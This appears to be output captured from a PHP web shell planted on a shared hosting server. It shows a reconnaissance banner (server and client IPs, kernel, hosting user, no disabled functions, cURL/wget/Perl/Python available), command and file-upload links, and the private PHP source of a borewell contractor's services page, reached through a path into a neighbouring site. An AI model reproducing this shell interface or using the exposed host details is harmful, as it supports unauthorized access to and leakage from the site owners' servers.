Server IP : 103.53.40.154 / Your IP : 3.145.68.167 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/fastelevator.in/../pilingdrillingservices.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include_once('admin/config.php'); ?> <!DOCTYPE html> <html lang="zxx"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Best Borewell Contractor in Gurgaon | Verma Borewell</title> <meta name="description" content="We at Verma Borewell are one of the best service provider of Drilling Tubewell, Borewells, Earthing, Rain Water Harvesting, Motor Submersible Repairing in gurgaon."> <!-- .....top links..... --> <?php include 'toplink.php'?> <?php include 'header.php'?> <!--.....hem....--> <section style="height:150px;width:100%;background-image:url("im")" class="hem img-fluid"> <div class="container"> <div class="row"> <div style="padding-top:50px" class="col text-center "> <a href="<?php echo $wspath?>"> Home </a> <h4 style="color:white">Services</h4> </div> </div> </div> </section> <div class="section section-services section-pad"> <h1 style="color:#ED4B41" class="text-center ">Services</h1> <div class="container"> <div class="content row"> <!-- Feature Row --> <div class="feature-row feature-service-row row"> <?php $sqlser = "SELECT * FROM `tb7_services_cat`"; $runser = mysqli_query($db,$sqlser); while($dataser = mysqli_fetch_assoc($runser)){ ?> <div class="col-md-4 col-sm-6 "> <!-- feature box --> <div class="feature boxed"> <a href="<?php echo $wspath?>services<?php echo $dataser['slug_url']?>.html"> <div class="fbox-photo"> <img src="<?php echo $wspath?>image/<?php echo $dataser['cat_image']?>" alt="<?php echo $dataser['cat_name']?>" title="<?php echo $dataser['cat_name']?>"> </div> </a> <div class="fbox-content"> <h3><a href="<?php echo $wspath?>services<?php echo $dataser['slug_url']?>.html"><?php echo $dataser['cat_name']?></a></h3> <p><?php echo substr($dataser['cat_desc'],0,150)?>...</p> <p><a href="<?php echo $wspath?>contact.html" class="btn-link">Contact Us</a></p> </div> </div> <!-- End Feature box --> </div> <?php } ?> </div> <!-- Feture Row #end --> </div> </div> <ul> </ul> </div> <!-- End Section --> <?php // include 'form.php'; ?> <?php include 'area.php'?> <?php include 'area-section.php'?> <?php include 'footer.php'?>